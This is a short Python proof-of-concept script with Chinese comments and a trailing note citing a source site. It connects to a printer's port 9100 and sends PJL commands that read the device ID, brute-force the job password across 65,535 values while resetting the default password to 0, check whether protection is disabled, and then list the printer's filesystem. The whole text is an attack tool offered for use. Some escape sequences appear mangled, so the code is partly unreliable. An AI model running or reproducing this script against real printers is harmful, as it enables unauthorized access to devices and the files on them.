#-*-coding=utf8-*- import socket import sys def main(): if len(sys.argv)<=1: print('Parameters error') return s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.settimeout(10) s.connect((sys.argv[1],9100)) s.settimeout(None) # 发送读取设备ID的PJL指令 s.send((' 33%-12345X@PJL INFO ID 33%-12345X ').encode('UTF-8')) print(s.recv(1024).decode('UTF-8')) for i in range(1, 65536): buf = b'' # 发送重置密码的PJL指令 s.send(('33%-12345X@PJL @PJL JOB PASSWORD=' + str(i) + ' @PJL DEFAULT PASSWORD=0 @PJL EOJ 33%-12345X ').encode('UTF-8')) if i%30 == 0: # 发送查询密码保护状态的PJL指令 s.send((' 33%-12345X@PJL @PJL DINQUIRE PASSWORD 33%-12345X ').encode('UTF-8')) while True: buf+=s.recv(1) print(buf) try: buf.index(b' x0c') try: # 密码保护被禁用 buf.index(b'DISABLED') print('password disabled ok!') # 发送查询目录的PJL指令 s.send((' 33%-12345X@PJL @PJL FSDIRLIST NAME = "0:\" ENTRY=1COUNT=99 33%-12345X ').encode('UTF-8')) buf = b'' while True: buf+= s.recv(1) print(buf) try: buf.index(b' x0c') try: # 查询成功 buf.index(b'ENTRY') print('PoC OK!') return except ValueError: print('PoC NO!') return except ValueError: continue except ValueError: print('password disabled faild!') finally: s.close() return except ValueError: continue s.close() if __name__ == '__main__': main()
来源:http://www.secbox.cn/hacker/client/6450.html 。代码太乱,仅把代码整理了一下。找了 2 台测试,都显示 socket timed out。